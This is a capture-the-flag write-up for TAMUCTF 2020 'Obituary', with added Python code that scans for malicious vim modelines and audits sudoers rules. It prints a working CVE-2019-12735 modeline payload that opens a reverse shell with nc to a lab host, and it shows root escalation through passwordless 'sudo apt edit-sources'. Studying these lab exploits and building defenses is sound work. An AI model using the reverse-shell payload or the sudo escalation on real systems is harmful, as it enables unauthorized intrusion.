TAMUCTF 2020: Obituary 1 & 2

2020/03/30

Categories: CTF Writeup Pentest

Challenge

Obituary

395+398 points

Hey, shoot me over your latest version of the code. I have a simple nc session up, just pass it over when you’re ready.

You’re using vim, right? You should use it; it’ll change your life. I basically depend on it for everything these days!


Obituary 1

We are given an OpenVPN configuration file. This will allow us to connect to the VPN and have access to 172.30.0.2.

Running a port scan with nmap -sC -sV 172.30.0.2 shows that only port 4321 is open. From the challenge text we can guess that files sent to this port are opened in the vim text editor (as the challenge says, you should use it). However, old versions of vim are vulnerable to CVE-2019-12735, which allows arbitrary code execution when a crafted file is opened. Looking around, we find that sending the following file gets us a reverse shell on port 3333:

:!nc 172.30.0.14 3333 -e /bin/bash||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

This line gets executed because the exploit relies on vim modelines, a “feature [that] allows to specify custom editor options near the start or end of a file.” Here the modeline sets the fold method to expr so that vim evaluates the fde (foldexpr) value as soon as the file is opened, and the :source! call wrapped in assert_fails() is the sandbox escape of CVE-2019-12735: it feeds the file back to vim as typed Normal-mode commands, so the leading :!nc shell escape is run.
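Because the escape rides on a modeline, a defender can catch such a file before vim ever opens it. The following Python checker is an added example and is not part of the original writeup: it looks only at the lines vim would consider (the first and last five, vim's default modelines window) and flags a modeline that forces foldmethod=expr or sets an expression option such as foldexpr, especially when the expression contains a source, system or execute call. The option set, the window size and the modeline regex are this example's own assumptions, and it covers only the common vi:/vim:/ex: forms. The operational fix is simpler: upgrade vim past 8.1.1365, where CVE-2019-12735 was patched, or put set nomodeline in vimrc.

```python
import re
from typing import Dict, List

# vim inspects at most 'modelines' lines (default 5) at the top and bottom of a file.
MODELINE_WINDOW = 5

# Short and long names of expression options a modeline may set; vim evaluates these
# when the file is opened (inside its sandbox, which CVE-2019-12735 let foldexpr escape).
# Assumed list for this example.
EXPRESSION_OPTIONS = {
    "fde", "foldexpr", "fdt", "foldtext",
    "inde", "indentexpr", "fex", "formatexpr", "inex", "includeexpr",
}

# Substrings inside an expression value that indicate an attempt to run commands
# rather than compute a fold level or fold text.
EXECUTION_PRIMITIVES = re.compile(r"source|system|execute|!")

# A modeline marker: 'vi:', 'vim:' or 'ex:' at the start of the line or after
# whitespace, optionally followed by the 'set'/'se' form.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|ex):\s*(?:set?\s+)?(.*)$")

# The one-line file from the writeup above, used here as the positive sample.
WRITEUP_PAYLOAD = r':!nc 172.30.0.14 3333 -e /bin/bash||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="'


def parse_options(body: str) -> Dict[str, str]:
    """Split a modeline body into {option_name: value}.

    Options are separated by ':' or whitespace; an escaped space ('\\ ') stays
    inside its value, which matters for payloads such as 'source\\!\\ \\%'.
    """
    options: Dict[str, str] = {}
    for chunk in body.split(":"):
        for token in re.split(r"(?<!\\)\s+", chunk.strip()):
            if not token:
                continue
            name, _, value = token.partition("=")
            options[name] = value
    return options


def assess_modeline(body: str) -> List[str]:
    """Return the reasons a modeline body looks like a sandbox-escape attempt."""
    reasons: List[str] = []
    options = parse_options(body)
    if options.get("fdm", options.get("foldmethod")) == "expr":
        reasons.append("foldmethod=expr forces foldexpr evaluation when the file opens")
    for name, value in options.items():
        if name in EXPRESSION_OPTIONS and value:
            reasons.append(f"expression option {name}={value!r} set from a modeline")
            if EXECUTION_PRIMITIVES.search(value):
                reasons.append(f"{name} contains a command-execution primitive")
    return reasons


def scan_text(text: str, window: int = MODELINE_WINDOW) -> List[dict]:
    """Check the lines vim would read as modelines and report the suspicious ones."""
    lines = text.splitlines()
    candidates = lines if len(lines) <= 2 * window else lines[:window] + lines[-window:]
    findings = []
    for line in candidates:
        match = MODELINE_RE.search(line)
        if not match:
            continue
        reasons = assess_modeline(match.group(1))
        if reasons:
            findings.append({"line": line, "reasons": reasons})
    return findings


def is_suspicious(text: str) -> bool:
    return bool(scan_text(text))


if __name__ == "__main__":
    for finding in scan_text(WRITEUP_PAYLOAD):
        print(finding["line"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

A benign header such as "# vim: set ts=4 sw=4 et:" produces no finding, and a payload buried in the middle of a longer file is ignored, which matches vim's own behaviour rather than being a gap in the checker.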

So, having started a nc listener (nc -lvvp 3333) in one window, we send the exploit file through nc:

cat exploit.txt | nc 172.30.0.2 4321

and terminate the process (Control+C). Coming back to the listener, we have a shell as user mwazowski and we can read the flag:

cat flag.txt
gigem{ca7_1s7_t0_mak3_suRe}

Obituary 2 (not the official solution)

For the second part of the challenge, we need to get root. We notice there is a note_to_self.txt file that says:

Apparently my packages are out of date. ITSEC is really throwing a fit about me
needing to update since red team popped my box.

I'm sending them my installed packages. I have no idea how these guys got root
on my machine, my password is like 60 characters long. The only thing I have
as nopasswd is apt, which I just use for updates anyway.

So apt is allowed with NOPASSWD, meaning we can run apt as root through sudo without a password. Looking around on gtfobins, we see that certain apt commands invoke a pager (most likely less) that can execute arbitrary commands, the same way vim does with :!command. However, trying what is shown on gtfobins throws an error:

sudo apt changelog apt
E: Failed to fetch changelog:/apt.changelog  Changelog unavailable for apt=1.8.2

So we have to find another way of invoking an editor or a pager. Looking at the help we notice:

apt --help
...
  edit-sources - edit the source information file

This subcommand opens the sources list in an editor, vim here, and vim's :! lets us execute commands as root:

sudo apt edit-sources
:!cat /root/flag.txt

We get the flag:

gigem{y0u_w0u1d_7h1nk_p3opl3_W0u1d_Kn0W_b3773r}
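The note_to_self gives the fix away: the sudoers rule grants apt as a whole when all the user needs is updating. The following Python audit is an added example and is not part of the writeup: it parses the common user-specification form of sudoers lines and flags NOPASSWD rules that hand out an editor or pager as root, either directly (vim, less) or through an interactive subcommand such as apt edit-sources or apt changelog. The binary list, the subcommand list and the sample sudoers text are constructed for this example. It relies on a real sudoers property: when a rule names arguments, sudo matches the argument list exactly, so a rule for /usr/bin/apt update does not let the user run apt edit-sources.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Binaries that can run another program from inside themselves, so NOPASSWD
# access to them is root access whatever the argument list. Assumed list.
SHELL_SPAWNERS = {"vim", "vi", "less", "more", "editor"}

# Package tools whose ordinary subcommands are fine but whose interactive
# subcommands hand the caller an editor or a pager, as apt edit-sources does.
INTERACTIVE_SUBCOMMANDS = {
    "apt": {"edit-sources", "changelog"},
    "apt-get": {"changelog"},
}

# "user host=(runas) TAG: cmd, TAG: cmd" is the only sudoers form handled here.
RULE_RE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*(.*)$")

# Constructed sample for this example, not the challenge box's real sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
# the rule the note_to_self describes: any apt subcommand, no password
mwazowski       ALL=(root) NOPASSWD: /usr/bin/apt
# hardened form: only the exact argument lists needed for updating
deploy          ALL=(root) NOPASSWD: /usr/bin/apt update, /usr/bin/apt upgrade -y
# an editor is never safe to hand out this way, whatever the file
ops             ALL=(root) NOPASSWD: /usr/bin/vim /etc/hosts, PASSWD: /usr/bin/apt edit-sources
"""


class Finding(NamedTuple):
    user: str
    command: str
    reason: str


def parse_rule(line: str) -> Optional[Tuple[str, List[Tuple[bool, str]]]]:
    """Return (user, [(nopasswd, command), ...]) for a user specification, else None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults") or "=" not in line:
        return None
    if line.split()[0].endswith("_Alias"):
        return None
    match = RULE_RE.match(line)
    if not match:
        return None
    user, _host, _runas, cmd_list = match.groups()
    commands: List[Tuple[bool, str]] = []
    nopasswd = False  # a tag persists for the rest of the command list
    for spec in cmd_list.split(","):
        spec = spec.strip()
        tag = TAG_RE.match(spec)
        while tag:
            if tag.group(1) == "NOPASSWD":
                nopasswd = True
            elif tag.group(1) == "PASSWD":
                nopasswd = False
            spec = tag.group(2)
            tag = TAG_RE.match(spec)
        if spec:
            commands.append((nopasswd, spec))
    return user, commands


def audit_sudoers(text: str) -> List[Finding]:
    """Flag NOPASSWD commands that give the caller an editor or pager as root."""
    findings: List[Finding] = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if not parsed:
            continue
        user, commands = parsed
        for nopasswd, command in commands:
            if not nopasswd:
                continue
            binary, *args = command.split()
            name = binary.rsplit("/", 1)[-1]
            if binary == "ALL":
                findings.append(Finding(user, command, "NOPASSWD for every command"))
            elif name in SHELL_SPAWNERS:
                findings.append(Finding(user, command, f"{name} spawns a shell from inside itself, whatever its arguments"))
            elif name in INTERACTIVE_SUBCOMMANDS:
                interactive = sorted(INTERACTIVE_SUBCOMMANDS[name])
                if not args or args == ["*"]:
                    findings.append(Finding(user, command, f"subcommand unrestricted; includes {', '.join(interactive)}"))
                elif args[0] in INTERACTIVE_SUBCOMMANDS[name]:
                    findings.append(Finding(user, command, f"{args[0]} opens an editor or pager as root"))
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{finding.user}: {finding.command}  ->  {finding.reason}")
```

On the sample, the mwazowski rule and the vim rule are reported and the deploy rule is not. Beyond tightening argument lists, sudo's NOEXEC tag is the general mitigation for editors and pagers that shell out, and the audit can be pointed at /etc/sudoers.d fragments as well as the main file.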